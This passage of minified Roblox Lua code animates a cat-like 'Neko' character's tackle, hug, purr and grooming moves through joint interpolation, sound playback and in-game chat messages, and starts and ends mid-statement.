new(0,0.645248413,0.258281708,-1,0,0,0,-0.342020512,0.939692497,0,0.939692497,0.342020512),lerpintensity)end;lB.Anchored=false;coroutine.resume(coroutine.create(function()wait(0.2)lB.Anchored=false end))on=true;action=false;pcall(function()for T,v in pairs(Character.Torso:GetChildren())do if v.Name=="Hugging"and v.ClassName=="Motor6D"then v:Destroy()end end end)lB.Parent:FindFirstChildOfClass("Humanoid").PlatformStand=false;if walking==true then spawn(WalkAnimation)elseif walking==false then spawn(IdleAnimation)end;Character.Humanoid.WalkSpeed=10;Character.Humanoid.JumpPower=jumppower end end;function SoftTackle()local lz=1;local lA=0;grabbed=false;running=false;local lB=nil;if action==true or freefall==true then return else action=true;lerpintensity=0.2 end;Character.Humanoid.JumpPower=0;Character.Humanoid.WalkSpeed=35;local lC;local function lD(ec)if ec.Parent:FindFirstChildOfClass("Humanoid")then grabbed=true;slave=ec.Parent;if ec.Parent:FindFirstChild("Torso")then lB=ec.Parent.Torso else lB=ec.Parent.UpperTorso end;lC:Disconnect()end end;lC=Character["Left Arm"].Touched:Connect(lD)local lE;local function lD(ec)if ec.Parent:FindFirstChildOfClass("Humanoid")then grabbed=true;if ec.Parent:FindFirstChild("Torso")then lB=ec.Parent.Torso else lB=ec.Parent.UpperTorso end;lE:Disconnect()end end;lE=Character["Right Arm"].Touched:Connect(lD)coroutine.resume(coroutine.create(function()repeat wait(0.1)lA=lA+0.1 until lA>=lz or grabbed==true;if lA>=lz then action=false;Character.Humanoid.WalkSpeed=10;Character.Humanoid.JumpPower=jumppower;lC:Disconnect()lE:Disconnect()if GunEquipped==true then if running==true then spawn(GunRunAnimation)elseif walking==true and running==false then spawn(GunWalkAnimation)elseif walking==false then spawn(GunIdleAnimation)end elseif GunEquipped==false then if walking==true then spawn(WalkAnimation)elseif walking==false then spawn(IdleAnimation)end end end end))Ring:Clone().Parent=Character.Torso;Character.Torso.Ring.CFrame=CFrame.new(Character.Torso.Position.X,Character.Torso.Position.Y,Character.Torso.Position.Z)*CFrame.new(0,-2.3,0)*CFrame.Angles(math.rad(90),0,0)local aj={}aj.Scale=Vector3.new(10,10,1)local lF=TweenInfo.new(0.6,Enum.EasingStyle.Quad,Enum.EasingDirection.Out)local lG=TweenService:Create(Character.Torso.Ring.Mesh,lF,aj)Character.Torso.Ring.Transparency=1;lG:Play()aj.Scale=nil;aj.Transparency=1;local lH=TweenService:Create(Character.Torso.Ring,lF,aj)lH:Play()DashJump:Play()lH.Completed:Connect(function()pcall(function()Character.Torso.Ring:Destroy()end)end)repeat wait()RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.50000012,0,1.29377966e-08,-0.173648164,0.984807789,7.33739043e-08,-0.984807789,-0.173648164,1,7.4505806e-08,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998093,1.50000024,0,-5.17511856e-09,0.173648164,-0.984807789,2.93495592e-08,-0.984807789,-0.173648164,-1,-2.98023224e-08,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.5,1,0,0,0.087155737,0.99619472,0,0.99619472,-0.087155737,-1,0,0),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1,0,0,-0.087155737,-0.99619472,0,0.99619472,-0.087155737,1,0,0),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.700000048,0,-1,0,0,0,1,4.47034836e-08,0,4.47034836e-08,-1),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0,0,-0.99999994,0,0,0,-0.996194661,0.0871559232,0,0.0871559158,0.99619472),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,-0.573576331,0.819152117,0,-0.819152117,-0.573576331),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)until action==false or grabbed==true;if action==false then return end;if grabbed==true then Grab:Play()local lI=Instance.new("Motor6D")lI.Name="Hugging"lI.C1=CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1)lI.C0=CFrame.new(-0.0495090485,2.10305977,-0.770607471,-1,0,0,0,0.25881806,0.965925753,0,0.965921581,-0.258819163)lI.Part0=Character.Torso;lI.Part1=lB;lI.Parent=Character.Torso;Character.Humanoid.WalkSpeed=10;for T=1,5 do wait()RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.30000007,0,-0.0713938177,0.0499904528,0.99619472,-0.573576093,-0.819152355,1.11758709e-08,0.816035211,-0.571393609,0.0871557295),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.3000015,-1.90734863e-06,-0.0713938028,-0.0499904826,-0.99619472,0.573576033,-0.819152415,5.58793545e-08,-0.816035271,-0.571393549,0.087155737),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.826281726,0.0961997509,-0.0113969073,0.0511440039,0.998626411,0.0852660537,0.995103419,-0.0499904603,-0.996293128,0.0845791027,-0.0157019645),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.831063509,0.0745928288,-0.0113969073,-0.0511439741,-0.998626411,-0.0852655172,0.995103478,-0.0499904566,0.996293187,0.0845785663,-0.015701957),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,0.819152117,0.573576331,0,0.573576331,-0.819152117),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.645248413,0.258281708,-1,0,0,0,-0.984807611,-0.173649192,0,-0.173649192,0.984807611),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.0871561915,0.996194601,0,-0.996194601,0.0871561915),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end;lI.C0=CFrame.new(-0.0495090485,2.10305977,-0.770607471,-1,0,0,0,0.25881806,0.965925753,0,0.965921581,-0.258819163)BodyFall:Play()for T=1,5 do wait()if T<=3 then lI.C0=CFrame.new(-0.0495090485,2.10305977,-0.770607471,-1,0,0,0,0.25881806,0.965925753,0,0.965921581,-0.258819163)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.30000007,0,-0.0713938177,0.0499904528,0.99619472,-0.573576093,-0.819152355,1.11758709e-08,0.816035211,-0.571393609,0.0871557295),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.3000015,-1.90734863e-06,-0.0713938028,-0.0499904826,-0.99619472,0.573576033,-0.819152415,5.58793545e-08,-0.816035271,-0.571393549,0.087155737),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.826281726,0.0961997509,-0.0113969073,0.0511440039,0.998626411,0.0852660537,0.995103419,-0.0499904603,-0.996293128,0.0845791027,-0.0157019645),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.831063509,0.0745928288,-0.0113969073,-0.0511439741,-0.998626411,-0.0852655172,0.995103478,-0.0499904566,0.996293187,0.0845785663,-0.015701957),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,0.819152117,0.573576331,0,0.573576331,-0.819152117),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.645248413,0.258281708,-1,0,0,0,-0.984807611,-0.173649192,0,-0.173649192,0.984807611),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.0871561915,0.996194601,0,-0.996194601,0.0871561915),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)else RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.30000007,0,-0.0713938177,0.0499904528,0.99619472,-0.573576093,-0.819152355,1.11758709e-08,0.816035211,-0.571393609,0.0871557295),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.3000015,-1.90734863e-06,-0.0713938028,-0.0499904826,-0.99619472,0.573576033,-0.819152415,5.58793545e-08,-0.816035271,-0.571393549,0.087155737),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.826281726,0.0961997509,-0.0113969073,0.0511440039,0.998626411,0.0852660537,0.995103419,-0.0499904603,-0.996293128,0.0845791027,-0.0157019645),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.831063509,0.0745928288,-0.0113969073,-0.0511439741,-0.998626411,-0.0852655172,0.995103478,-0.0499904566,0.996293187,0.0845785663,-0.015701957),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,0.819152117,0.573576331,0,0.573576331,-0.819152117),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.645248413,0.258281708,-1,0,0,0,-0.984807611,-0.173649192,0,-0.173649192,0.984807611),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.0871561915,0.996194601,0,-0.996194601,0.0871561915),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end end;lI.C0=CFrame.new(-0.0495090485,2.10305977,-0.770607471,-1,0,0,0,0.25881806,0.965925753,0,0.965921581,-0.258819163)Character.Humanoid.WalkSpeed=0;lerpintensity=0.1;repeat local lJ=math.random(1,10)if lJ<10 then for T=1,30 do wait()if T<5 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.965925694,-0.25881952,0,0.25881952,0.965925694),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)elseif T>=5 and T<10 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.984807789,0.173647702,0,-0.173647702,0.984807789),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)elseif T>=10 and T<15 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.965925694,-0.25881952,0,0.25881952,0.965925694),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)elseif T>=15 and T<20 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.984807789,0.173647702,0,-0.173647702,0.984807789),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)elseif T>=20 and T<25 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.965925694,-0.25881952,0,0.25881952,0.965925694),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)elseif T>=25 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.984807789,0.173647702,0,-0.173647702,0.984807789),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end;if T>15 then RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.30000007,0,-0.0713938177,0.0499904528,0.99619472,-0.816035151,0.571393549,-0.087155737,-0.573576152,-0.819152236,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.3000015,-1.90734863e-06,-0.0713938028,-0.0499904826,-0.99619472,0.816034973,0.571393907,-0.087155737,0.57357651,-0.819152057,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.826281726,0.0961997509,0.07547912,0.0435778312,0.996194839,0.862730265,0.498097062,-0.087155737,-0.499999672,0.866025746,1.58324838e-08),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.831063509,0.0745928288,0.0754791349,-0.0435778461,-0.996194839,-0.862730086,0.498097271,-0.0871557519,0.499999851,0.866025507,1.62981451e-08),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,-0.642787695,0.766044319,0,0.766044319,0.642787695),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.645248413,0.258281708,-1,0,0,0,-0.342020512,0.939692497,0,0.939692497,0.342020512),lerpintensity)end;lI.C0=lI.C0:Lerp(CFrame.new(-0.0227355957,-1.26026344,-1.37898636,-1,0,0,0,0.573576629,-0.819151938,0,-0.819151938,-0.573576629),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.39999998,-0.100000001,-0.0713938177,0.0499904528,0.99619472,-0.96299684,0.25676772,-0.0818995982,-0.259884864,-0.965179384,0.0298090167),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.40000141,-0.100001909,-0.0713938028,-0.0499904826,-0.99619472,0.962996662,0.256768346,-0.0818996057,0.25988543,-0.965179324,0.0298089981),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.42628178,0.0961997509,0.07547912,0.0435778312,0.996194839,0.639691591,0.76425612,-0.0818996131,-0.764916778,0.643439114,0.0298089981),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.431063563,0.0745928288,0.0754791349,-0.0435778461,-0.996194839,-0.639691174,0.764256358,-0.0818996206,0.764917135,0.643438578,0.0298090223),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,-0.707106829,0.70710665,0,0.70710665,0.707106829),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.645248413,0.258281708,-1,0,0,0,-0.573576629,0.819151938,0,0.819151938,0.573576629),lerpintensity)end else local lK=math.random(1,2)if lK==1 then SmallSquish:Play()else BigSquish:Play()end;lerpintensity=0.2;for T=1,7 do wait()if T>3 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.984807789,0.173647702,0,-0.173647702,0.984807789),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)else TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.965925932,0.258818567,0,-0.258818567,0.965925932),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end;lI.C0=lI.C0:Lerp(CFrame.new(-0.0227355957,-1.26026344,-1.37898636,-1,0,0,0,0.573576629,-0.819151938,0,-0.819151938,-0.573576629),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.39999998,-0.100000001,-0.0713938177,0.0499904528,0.99619472,-0.96299684,0.25676772,-0.0818995982,-0.259884864,-0.965179384,0.0298090167),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.40000141,-0.100001909,-0.0713938028,-0.0499904826,-0.99619472,0.962996662,0.256768346,-0.0818996057,0.25988543,-0.965179324,0.0298089981),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.42628178,0.0961997509,0.07547912,0.0435778312,0.996194839,0.639691591,0.76425612,-0.0818996131,-0.764916778,0.643439114,0.0298089981),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.431063563,0.0745928288,0.0754791349,-0.0435778461,-0.996194839,-0.639691174,0.764256358,-0.0818996206,0.764917135,0.643438578,0.0298090223),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,-0.707106829,0.70710665,0,0.70710665,0.707106829),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.645248413,0.258281708,-1,0,0,0,-0.573576629,0.819151938,0,0.819151938,0.573576629),lerpintensity)end end until on=="more"or on=="false"local lo=false;purring:Play()repeat if on=="false"then break end;if lo==false then lo=true;coroutine.resume(coroutine.create(function()local lx={[1]="bruh [Neko]: prrrrrrrrrrrr...",[2]="All"}game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(lx))end))else coroutine.resume(coroutine.create(function()Talk("prrrrrrrrrrrr...")end))end;lerpintensity=0.15;for T=1,15 do wait()if T<=7 then if T==1 then brushsound:Play()local lJ=math.random(8,13)purring.PlaybackSpeed=lJ/10 end;lI.C0=lI.C0:Lerp(CFrame.new(0.0583114624,-0.512584686,-1.41906452,-0.99619472,0,-0.087155737,0.0298089981,0.939692736,-0.340718448,0.0818996131,-0.342019916,-0.936116934),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.438678026,0.680997431,0.586348057,-0.474547088,-0.378539503,0.794677913,0.763129473,-0.626857519,0.157108307),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.300007641,0.600003064,-0.100000381,-0.230375499,0.115933135,0.966171086,-0.934927404,0.249000192,-0.252803802,-0.269885123,-0.961539626,0.0510255098),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.273846447,0.619167328,-0.0977859497,-0.389224023,-0.157410368,-0.907593906,0.880719543,0.225086316,-0.41673708,0.269885838,-0.961539865,0.051025331),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.497009277,-0.173597336,0.196154714,0.0262007248,-0.0151497796,0.999542058,0.343312234,0.939207077,0.00523614883,-0.938855946,0.343017817,0.0298089981),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.497009277,-0.168815613,0.174548149,0.0854182094,-0.148172021,-0.98526603,-0.33354643,0.927569389,-0.16841206,0.938856184,0.34301731,0.0298090223),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0.200912476,-0.709360123,0.458553314,-0.800952435,0.101351067,0.590087712,0.368687898,-0.693053365,0.619472563,0.471746415,0.713726521,0.517735839),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0.298843384,0.105287552,1.00426102,-0.99619472,0,0.087155737,0.0298089981,-0.939692736,0.340718448,0.0818996131,0.342019916,0.936116934),lerpintensity)else if T==8 then brushsound:Play()end;lI.C0=lI.C0:Lerp(CFrame.new(0.195236206,-0.504997253,-1.39821768,-0.99619472,0,0.087155737,-0.0298089981,0.939692736,-0.340718448,-0.0818996131,-0.342019916,-0.936116934),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.300018311,0.600002289,-0.100000381,-0.386793852,0.164786592,0.90732348,-0.880415916,0.226710796,-0.416497767,-0.274333209,-0.959920764,0.0573903918),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.273849487,0.619165421,-0.0977859497,-0.232747033,-0.108718231,-0.966441572,0.935460567,0.246745914,-0.253043085,0.265976012,-0.962962985,0.0442721732),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.497024536,-0.173601151,0.196154594,0.116779052,0.226236105,0.967047155,0.343777001,0.904307723,-0.25307247,-0.93176204,0.362002134,0.0278293937),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.497009277,-0.168815613,0.174548388,0.0265306477,0.0151176825,-0.999533892,-0.347999454,0.937482119,0.00494225696,0.937119603,0.347706079,0.0301329084),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0.570289612,-0.803970337,-0.0138549805,0.00520382822,0.624937713,0.78065753,-0.286788315,-0.746941745,0.59985894,0.957979977,-0.22700496,0.175337881),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.11423111,1.02883196,-0.99619472,0,-0.087155737,-0.0298089981,-0.939692736,0.340718448,-0.0818996131,0.342019916,0.936116934),lerpintensity)TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,0.9468472,-0.225056857,0.229848579,-0.193389788,0.172739729,0.965796232,-0.257062763,-0.95891124,0.120034307),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)end end until on=="false"coroutine.resume(coroutine.create(function()local lx={[1]="bro [Neko]: -w-",[2]="All"}game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(lx))end))purring:Stop()for T=1,5 do wait()RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.5,1.30000007,0,-0.0713938177,0.0499904528,0.99619472,-0.816035151,0.571393549,-0.087155737,-0.573576152,-0.819152236,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,1.3000015,-1.90734863e-06,-0.0713938028,-0.0499904826,-0.99619472,0.816034973,0.571393907,-0.087155737,0.57357651,-0.819152057,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.500001192,0.826281726,0.0961997509,0.07547912,0.0435778312,0.996194839,0.862730265,0.498097062,-0.087155737,-0.499999672,0.866025746,1.58324838e-08),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,0.831063509,0.0745928288,0.0754791349,-0.0435778461,-0.996194839,-0.862730086,0.498097271,-0.0871557519,0.499999851,0.866025507,1.62981451e-08),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-1,0,0,0,-0.642787695,0.766044319,0,0.766044319,0.642787695),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,0.645248413,0.258281708,-1,0,0,0,-0.342020512,0.939692497,0,0.939692497,0.342020512),lerpintensity)end;coroutine.resume(coroutine.create(function()wait(0.2)end))on=true;action=false;pcall(function()for T,v in pairs(Character.Torso:GetChildren())do if v.Name=="Hugging"and v.ClassName=="Motor6D"then v:Destroy()end end end)if walking==true then spawn(WalkAnimation)elseif walking==false then spawn(IdleAnimation)end;Character.Humanoid.WalkSpeed=10;Character.Humanoid.JumpPower=jumppower end end;function Groom()lr.Trash:WaitForChild("Head").Attachment1.Position=Vector3.new(0,0,0)lr.Trash:WaitForChild("Head").Attachment2.Position=Vector3.new(0,0,-.01)lr.Trash:WaitForChild("Head").Attachment3.Position=Vector3.new(0,0,0)local lz=1;local lA=0;grabbed=false;running=false;local lB=nil;if action==true or freefall==true then return else action=true;lerpintensity=0.2 end;Character.Humanoid.JumpPower=0;Character.Humanoid.WalkSpeed=35;coroutine.resume(coroutine.create(function()repeat wait(0.1)lA=lA+0.1 until lA>=lz or grabbed==true;if lA>=lz then action=false;Character.Humanoid.WalkSpeed=10;Character.Humanoid.JumpPower=jumppower;if GunEquipped==true then if running==true then spawn(GunRunAnimation)elseif walking==true and running==false then spawn(GunWalkAnimation)elseif walking==false then spawn(GunIdleAnimation)end elseif GunEquipped==false then if walking==true then spawn(WalkAnimation)elseif walking==false then spawn(IdleAnimation)end end end end))Ring:Clone().Parent=Character.Torso;Character.Torso.Ring.CFrame=CFrame.new(Character.Torso.Position.X,Character.Torso.Position.Y,Character.Torso.Position.Z)*CFrame.new(0,-2.3,0)*CFrame.Angles(math.rad(90),0,0)local aj={}aj.Scale=Vector3.new(10,10,1)local lF=TweenInfo.new(0.6,Enum.EasingStyle.Quad,Enum.EasingDirection.Out)local lG=TweenService:Create(Character.Torso.Ring.Mesh,lF,aj)Character.Torso.Ring.Transparency=1;lG:Play()aj.Scale=nil;aj.Transparency=1;local lH=TweenService:Create(Character.Torso.Ring,lF,aj)lH:Play()lH.Completed:Connect(function()pcall(function()Character.Torso.Ring:Destroy()end)end)purring:Play()grabbed=true;if action==false then return end;if grabbed==true then end;Character.Humanoid.WalkSpeed=0;lerpintensity=0.1;for T=1,15 do wait()TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.98480767,-0.173648626,0,0.173648626,0.98480767),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.500001907,0.700000763,3.81469727e-06,-0.212012142,0.148452476,0.965925813,-0.791240156,0.554032147,-0.258819044,-0.573576331,-0.819152117,0),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.499998122,0.50000149,-1.90734863e-06,-0.54167527,-0.54167521,-0.642787635,0.45451957,0.45451948,-0.766044438,0.707106769,-0.707106888,0),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(-0.206653118,0.875644684,-0.290397644,0.599353969,-0.78719008,0.145280719,-0.726487219,-0.611128151,-0.314227045,0.336141646,0.0827887207,-0.938165724),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.200000018,0.631063461,0.274592966,-0.696535289,-0.623583138,-0.354940355,0.632912159,-0.300920159,-0.713350654,0.338024706,-0.721520066,0.604274809),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0,-0.5,0,-0.939692557,-0.309975654,-0.14454414,0.0298090428,-0.495236635,0.868246615,-0.340718865,0.811576068,0.47461018),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,1.2688303,0.591665268,-1,0,0,0,-0.422618449,0.906307697,0,0.906307697,0.422618449),lerpintensity)end;repeat for T=1,30 do wait()if T>15 then TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.98480767,-0.173648626,0,0.173648626,0.98480767),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.380865097,0.944504738,0.102607727,-0.298836291,0.298836201,0.906307757,-0.640856564,0.640856266,-0.42261827,-0.707106888,-0.707106948,3.36828379e-08),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.359044552,0.955858231,0.102600098,-0.353553444,-0.353553385,-0.866025209,0.612372696,0.612372339,-0.5,0.707106948,-0.707106948,-5.05242355e-08),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.199999988,1.12627983,-0.103800572,0.549776137,0.331297398,0.76680398,-0.668760061,-0.375469327,0.64170301,0.500505924,-0.865600824,0.0151344091),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1.03106344,-0.525407076,0.0667652041,-0.0560226068,-0.996194661,0.256431252,-0.963922322,0.0713938028,-0.964253783,-0.260222107,-0.0499905124),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0.200000003,-0.800000012,0,-1,0,0,0,-0.939692795,0.342019498,0,0.342019498,0.939692795),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,1.45009613,0.676193237,-1,2.30967999e-07,0,-9.68575478e-08,-0.422618479,0.906307697,1.86264515e-07,0.906307757,0.422618449),lerpintensity)else if T==1 then brushsound:Play()end;TailWeld.C1=TailWeld.C1:Lerp(CFrame.new(0,0,0,1,0,0,0,0.98480767,-0.173648626,0,0.173648626,0.98480767),lerpintensity)TailWeld.C0=TailWeld.C0:Lerp(CFrame.new(-9.53674316e-07,-0.899998903,0.500267029,1,0,0,0,1,0,0,0,1),lerpintensity)RShoulder.C1=RShoulder.C1:Lerp(CFrame.new(0.385093689,0.95358181,0.126781464,-0.29883635,0.298836231,0.906307757,-0.640856504,0.640856326,-0.42261824,-0.707106948,-0.707106948,1.54024349e-08),lerpintensity)LShoulder.C1=LShoulder.C1:Lerp(CFrame.new(-0.364051819,0.964536667,0.126785278,-0.353553474,-0.353553414,-0.866025388,0.612372637,0.612372458,-0.5,0.707107008,-0.707107008,-1.54024349e-08),lerpintensity)RHip.C1=RHip.C1:Lerp(CFrame.new(0.199996948,1.12628174,-0.10380125,0.665907323,0.373565733,0.645768106,-0.553245008,-0.333425283,0.763379157,0.500487685,-0.865607619,-0.0153569616),lerpintensity)LHip.C1=LHip.C1:Lerp(CFrame.new(-0.5,1.03106344,-0.525407076,0.0667652041,-0.0560226068,-0.996194661,0.085094586,-0.994465292,0.0616284087,-0.994133413,-0.0888853818,-0.061628446),lerpintensity)Neck.C1=Neck.C1:Lerp(CFrame.new(0.200001717,-0.782634735,0.0984802246,-1,5.21098116e-08,-3.27107017e-08,5.63623104e-08,-0.866026402,0.499999702,-7.43935971e-08,0.499999642,0.866025925),lerpintensity)RJoint.C1=RJoint.C1:Lerp(CFrame.new(0,1.42257214,0.754058838,-1,2.30967999e-07,0,-8.02549565e-08,-0.342020363,0.939692616,1.93997408e-07,0.939692676,0.342020333),lerpintensity)end end until on=="more"or on=="false"for T=1,15 do 